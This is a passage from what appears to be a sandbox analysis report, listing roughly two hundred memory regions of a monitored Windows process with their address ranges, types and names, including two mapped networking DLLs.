private name = "private_0x0000000000460000" filename = "" Region: id = 4094 start_va = 0x102d0000 end_va = 0x107c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000102d0000" filename = "" Region: id = 4095 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4096 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4097 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4098 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4099 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4100 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4101 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4102 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4103 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4104 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4105 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4106 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4107 start_va = 0x7ffd44b30000 end_va = 0x7ffd44b44fff monitored = 0 entry_point = 0x7ffd44b32dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 4108 start_va = 0x7ffd45440000 end_va = 0x7ffd454a6fff monitored = 0 entry_point = 0x7ffd454463e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4109 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4110 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4111 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4112 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4113 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4114 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4115 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4116 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4117 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4118 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4119 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4120 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4121 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4122 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4123 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4124 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4125 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4126 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4127 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4128 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4129 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4130 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4131 start_va = 0x8ed0000 end_va = 0x8fc9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008ed0000" filename = "" Region: id = 4132 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4133 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4134 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4135 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4136 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4137 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4138 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4139 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4140 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4141 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4142 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4143 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4144 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4145 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4146 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4147 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4148 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4149 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4150 start_va = 0x6f0000 end_va = 0x6fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 4151 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4152 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4153 start_va = 0x8ed0000 end_va = 0x8fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ed0000" filename = "" Region: id = 4154 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4155 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4156 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4157 start_va = 0x6f0000 end_va = 0x6fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 4158 start_va = 0x620000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4159 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4160 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4161 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4162 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4163 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4164 start_va = 0xb3d0000 end_va = 0xb5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3d0000" filename = "" Region: id = 4165 start_va = 0xf7d0000 end_va = 0xfbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f7d0000" filename = "" Region: id = 4166 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4167 start_va = 0x620000 end_va = 0x63dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4168 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4169 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4170 start_va = 0x90d0000 end_va = 0x91d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4171 start_va = 0x9210000 end_va = 0x921ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009210000" filename = "" Region: id = 4172 start_va = 0xafd0000 end_va = 0xb0d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4173 start_va = 0x90d0000 end_va = 0x91dafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4174 start_va = 0xafd0000 end_va = 0xb0e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4175 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4176 start_va = 0x620000 end_va = 0x63dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4177 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4178 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4179 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4180 start_va = 0x90d0000 end_va = 0x91dcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4181 start_va = 0xafd0000 end_va = 0xb0dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4182 start_va = 0x90d0000 end_va = 0x91e9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4183 start_va = 0xafd0000 end_va = 0xb0e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4184 start_va = 0x90d0000 end_va = 0x91e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4185 start_va = 0xafd0000 end_va = 0xb0ecfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4186 start_va = 0x90d0000 end_va = 0x91eefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4187 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4188 start_va = 0x620000 end_va = 0x63dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4189 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4190 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4191 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4192 start_va = 0xafd0000 end_va = 0xb0f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4193 start_va = 0x90d0000 end_va = 0x91eefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4194 start_va = 0xafd0000 end_va = 0xb0f9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4195 start_va = 0x620000 end_va = 0x622fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4196 start_va = 0x90d0000 end_va = 0x91f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4197 start_va = 0xafd0000 end_va = 0xb0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4198 start_va = 0x90d0000 end_va = 0x9202fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4199 start_va = 0xafd0000 end_va = 0xb0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4200 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4201 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4202 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4203 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4204 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4205 start_va = 0x90d0000 end_va = 0x9200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4206 start_va = 0xafd0000 end_va = 0xb107fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4207 start_va = 0x90d0000 end_va = 0x9207fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4208 start_va = 0xafd0000 end_va = 0xb10efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4209 start_va = 0xf3f0000 end_va = 0xf536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4210 start_va = 0x90d0000 end_va = 0x920dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 4211 start_va = 0xafd0000 end_va = 0xb117fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4212 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4213 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4214 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4215 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4216 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4217 start_va = 0xf3f0000 end_va = 0xf531fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4218 start_va = 0xafd0000 end_va = 0xb117fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4219 start_va = 0xf3f0000 end_va = 0xf537fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4220 start_va = 0xafd0000 end_va = 0xb125fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4221 start_va = 0xf3f0000 end_va = 0xf538fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4222 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4223 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4224 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4225 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4226 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4227 start_va = 0xafd0000 end_va = 0xb125fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4228 start_va = 0xf3f0000 end_va = 0xf542fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4229 start_va = 0xafd0000 end_va = 0xb121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4230 start_va = 0xf3f0000 end_va = 0xf54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4231 start_va = 0xafd0000 end_va = 0xb129fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4232 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4233 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4234 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4235 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4236 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4237 start_va = 0xf3f0000 end_va = 0xf549fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4238 start_va = 0xafd0000 end_va = 0xb138fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4239 start_va = 0xf3f0000 end_va = 0xf552fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4240 start_va = 0xafd0000 end_va = 0xb13cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4241 start_va = 0xf3f0000 end_va = 0xf552fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4242 start_va = 0xafd0000 end_va = 0xb13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4243 start_va = 0xf3f0000 end_va = 0xf561fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4244 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4245 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4246 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4247 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4248 start_va = 0xafd0000 end_va = 0xb140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4249 start_va = 0xf3f0000 end_va = 0xf568fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4250 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4251 start_va = 0xafd0000 end_va = 0xb144fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4252 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4253 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4254 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4255 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4256 start_va = 0xf3f0000 end_va = 0xf566fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4257 start_va = 0xafd0000 end_va = 0xb14dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4258 start_va = 0xf3f0000 end_va = 0xf568fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4259 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4260 start_va = 0xafd0000 end_va = 0xb14efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 4261 start_va = 0xf3f0000 end_va = 0xf576fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4262 start_va = 0xf580000 end_va = 0xf700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f580000" filename = "" Region: id = 4263 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4264 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4265 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4266 start_va = 0xf3f0000 end_va = 0xf57afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4267 start_va = 0xf580000 end_va = 0xf70dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f580000" filename = "" Region: id = 4268 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4269 start_va = 0x620000 end_va = 0x622fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4270 start_va = 0xf3f0000 end_va = 0xf577fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4271 start_va = 0xf580000 end_va = 0xf712fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f580000" filename = "" Region: id = 4272 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4273 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4274 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4275 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4276 start_va = 0xf3f0000 end_va = 0xf57efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4277 start_va = 0xf580000 end_va = 0xf715fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f580000" filename = "" Region: id = 4278 start_va = 0xfdd0000 end_va = 0xff62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4279 start_va = 0xf3f0000 end_va = 0xf58cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4280 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4281 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4282 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4283 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4284 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4285 start_va = 0xf590000 end_va = 0xf72dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f590000" filename = "" Region: id = 4286 start_va = 0xf3f0000 end_va = 0xf587fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3f0000" filename = "" Region: id = 4287 start_va = 0x620000 end_va = 0x623fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4288 start_va = 0xf590000 end_va = 0xf729fff monitored = 1 